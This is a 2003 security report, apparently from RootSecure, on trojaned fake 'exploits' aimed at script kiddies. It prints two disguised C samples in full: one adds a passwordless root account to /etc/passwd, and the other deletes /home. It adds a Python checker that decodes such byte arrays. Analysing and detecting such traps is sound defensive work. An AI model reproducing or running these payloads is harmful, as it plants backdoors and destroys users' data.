Reports | Hackers Hack 'Script Kiddies' {3rd May 2003}
Script kiddies, those who typically use existing, well-known exploits to
gain unauthorized access to computer systems with little regard for the
actual code and how it works, be warned: examine what you execute.
Most people realise, or quickly find out, that downloading '31337 hax40r
too1z' from sites on free web space is generally not such a good idea,
since more likely than not these programmes come with extras that are
often destructive. Now, however, those who blindly run code hoping to,
for example, deface yet another supposedly vulnerable web server have
another problem to consider besides hiding their identity: does the code
they downloaded really do what it says, or is it a convincing fake which
actually, say, adds a new root account with no password to the local
system?
The practice of producing such 'exploit' code is certainly not widespread;
however, it does happen:
```c
/*
Remote apache 2.0.45 root exploit (linux)
Some code taken from an old apache 1.3* exploit, author unknown.
Updated and fixed by WhiteRaven of Hackerhost.com
Due to the nature of the exploit you must be root
on the local box for this to work.
to compile:
gcc apache.c -o apache
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>     /* memcpy, memset, strlen */
#include <strings.h>    /* bzero, bcopy */
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>   /* wait */
#include <netinet/in.h>
#include <arpa/inet.h>

/* This is not machine code. The bytes are the ASCII text
   "echo rav3n::0:0::/:/bin/sh >> /etc/passwd": a shell command that adds
   a passwordless root account on the machine running this program. */
char shellcode[] = \
"\x65\x63\x68\x6f\x20\x72\x61\x76\x33\x6e\x3a\x3a\x30\x3a"
"\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x20"
"\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
#define NOP 0x90
#define BSIZE 256
#define OFFSET 400
#define ADDR 0xbffff658
#define ASIZE 2000
int main(int argc, char *argv[])
{
    char *buffer;
    int s;
    struct hostent *hp;
    struct sockaddr_in sin;
    if (argc != 2){
        printf("Apache 2.0.45 Remote Expliot by WhiteRaven");
        printf("%s <target>\n", argv[0]);
        exit(1);
    }
    buffer = (char *)malloc(BSIZE + ASIZE + 100);
    if (buffer == NULL) {
        printf("Not enough memory! Exiting.\n");
        exit(1);
    }
    /* The original read this buffer uninitialised; a NOP fill is assumed
       here from the otherwise unused NOP define so strlen() below is defined. */
    memset(buffer, NOP, BSIZE + ASIZE + 100);
    memcpy(&buffer[BSIZE - strlen(shellcode)], shellcode, strlen(shellcode));
    buffer[BSIZE + ASIZE] = ';';
    buffer[BSIZE + ASIZE + 1] = '\0'; /* assumed terminator: this line was garbled in the page copy */
    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        printf("No such target server. Exiting.\n");
        exit(1);
    }
    bzero(&sin, sizeof(sin));
    bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(80); /* Port 80 is HTTP */
    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s < 0) {
        printf("Can't open socket, Exiting.\n");
        exit(1);
    }
    if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
        printf("Connection refused.\nIs the target running a webserver?\nExiting.\n");
        exit(1);
    }
    printf("Sending exploit code...\n");
    /* send() returns the byte count (or -1), never 1 for a buffer this size,
       so "successful" is printed whatever the server does: the request is
       only padding, and nothing remote is exploited. */
    if (send(s, buffer, strlen(buffer), 0) != 1){
        printf("exploit was successful!\n");
    }else{
        printf("Sorry, This target isn't vulnerable\n");
    }
    printf("Waiting for shell.....\n");
    /* The real payload: the decoded command runs locally as root, which is
       why the header insists you "must be root on the local box". */
    if (fork() == 0)
        execl("/bin/sh", "sh", "-c", shellcode, (char *)0);
    else
        wait(NULL);
    while(1){
        /* shell: spins forever, there is no remote shell to receive */
    }
    return 0;
}
```
```c
/*
Proof of concept code!!
DO NOT DISTRIBUTE!
d4yj4y_at_yahoo.com
Get r00t on any Linux x86 system
With the below shellcode.
It uses an exploit in the linux
kernel to elevate privileges to root!
*/
#include <stdlib.h>   /* system */

/* Again plain ASCII rather than shellcode: the bytes read
   "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe", which system() runs
   with the privileges of whoever compiled and executed this file. */
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20" "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61" "\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c" "\x68\x65\x68\x65";
int main(void)
{
    system(shellcode);
    return 0;
}
```
Anyone running the above code purporting to be a zero-day "Remote apache
2.0.45 root exploit" would find an extra root account on their system
under the name rav3n with no password. Decoding the hex characters (65 63
68 6f 20 72 61 76 33 6e 3a 3a 30 3a 30 3a 3a 2f 3a 2f 62 69 6e 2f 73 68 20
3e 3e 20 2f 65 74 63 2f 70 61 73 73 77 64) to ASCII reveals the command
"echo rav3n::0:0::/:/bin/sh >> /etc/passwd", and translating the "Get
r00t on any Linux x86 system" code shows "/bin/rm -rf /home/*;clear;echo
bl4ckh4t,hehe".
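The decoding step described above can be automated before anything is compiled. The following script is an added example, not part of the RootSecure report or of either "exploit": it pulls every `char name[] = "\x.."` initialiser out of a C source file, decodes the escapes as the compiler would, and reports whether the bytes look like machine code or are entirely printable text. Genuine x86 shellcode is dense with non-printable bytes, so a "shellcode" array that decodes to 100% printable ASCII is, as with both samples on this page, a command string destined for `system()` or `execl()`. The two initialisers embedded at the bottom are copied from the report and labelled as the constructed input; the function names and the printable-ratio rule are this example's own.

```python
"""Static check for 'shellcode' arrays in downloaded C exploit source.

Added example: decodes every `char name[] = "\\x.."` initialiser in a C
file and reports whether the bytes are machine code or, as in the two
samples quoted on this page, a plain-text shell command.
"""
import re
import string

# A C string literal body: runs of non-quote/non-backslash chars or escapes.
_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')
# `char name[] = "..." "..." ;` with optional line-continuation backslashes.
_INIT = re.compile(
    r'char\s+(\w+)\s*\[\s*\]\s*=\s*\\?\s*((?:"(?:[^"\\]|\\.)*"\s*\\?\s*)+);',
    re.DOTALL,
)
_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\(.)', re.DOTALL)
_SIMPLE = {"n": b"\n", "t": b"\t", "r": b"\r", "\\": b"\\", '"': b'"', "'": b"'"}
_PRINTABLE = set(string.printable.encode())


def decode_c_literal(body: str) -> bytes:
    """Turn the inside of one C string literal into the bytes it denotes."""
    out = bytearray()
    pos = 0
    for m in _ESCAPE.finditer(body):
        out += body[pos:m.start()].encode("latin-1")
        if m.group(1) is not None:        # \xNN
            out.append(int(m.group(1), 16))
        elif m.group(2) is not None:      # \NNN octal
            out.append(int(m.group(2), 8) & 0xFF)
        else:                             # \n, \t, \\, \" ...
            out += _SIMPLE.get(m.group(3), m.group(3).encode("latin-1"))
        pos = m.end()
    out += body[pos:].encode("latin-1")
    return bytes(out)


def extract_byte_arrays(c_source: str) -> dict:
    """Map each `char name[] = "..."` initialiser to its decoded bytes.
    Adjacent literals are concatenated, exactly as the C compiler does."""
    arrays = {}
    for m in _INIT.finditer(c_source):
        pieces = _LITERAL.findall(m.group(2))
        arrays[m.group(1)] = b"".join(decode_c_literal(p) for p in pieces)
    return arrays


def classify(data: bytes) -> dict:
    """Report whether a byte array looks like machine code or readable text.

    Heuristic (this example's own): real shellcode contains non-printable
    bytes, so an array that is entirely printable ASCII is a command string
    the program will hand to a shell, and should be read before compiling."""
    printable = sum(1 for b in data if b in _PRINTABLE)
    ratio = printable / len(data) if data else 0.0
    text = data.decode("ascii") if ratio == 1.0 else None
    return {
        "length": len(data),
        "printable_ratio": round(ratio, 3),
        "verdict": "plaintext command, not shellcode" if ratio == 1.0 else "binary",
        "text": text,
    }


def audit(c_source: str) -> dict:
    """Classify every byte-array initialiser found in a C source string."""
    return {name: {**classify(data), "bytes": data}
            for name, data in extract_byte_arrays(c_source).items()}


# Constructed input: the two initialisers quoted in the report above.
FAKE_APACHE = r'''char shellcode[] = \
"\x65\x63\x68\x6f\x20\x72\x61\x76\x33\x6e\x3a\x3a\x30\x3a"
"\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x20"
"\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";'''

FAKE_KERNEL = r'''char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20" "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61" "\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c" "\x68\x65\x68\x65";'''

if __name__ == "__main__":
    for label, src in (("apache", FAKE_APACHE), ("kernel", FAKE_KERNEL)):
        for name, report in audit(src).items():
            print(f"{label}/{name}: {report['verdict']} -> {report['text']!r}")
```

Run it against a downloaded `.c` file by passing the file contents to `audit()`; any array whose verdict is "plaintext command" should be read as the shell command it is, and the surrounding code checked for the `system()`, `execl()` or `popen()` call that would run it locally.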
Programs such as these, written by 'hackers' who are increasingly
frustrated with those who give them a bad name in the eyes of the media
(by mindlessly attacking machines with the intent of causing damage), reopen
the long-running debate on whether systems administrators should have the
right to disable machines attacking their networks, this time by
proactive rather than reactive means.
It should be noted that the code is written in the hope that legitimate
security professionals would not run exploit code written in any language
of which they do not have at least a basic understanding; otherwise the
security profession will find itself coming under even greater attack.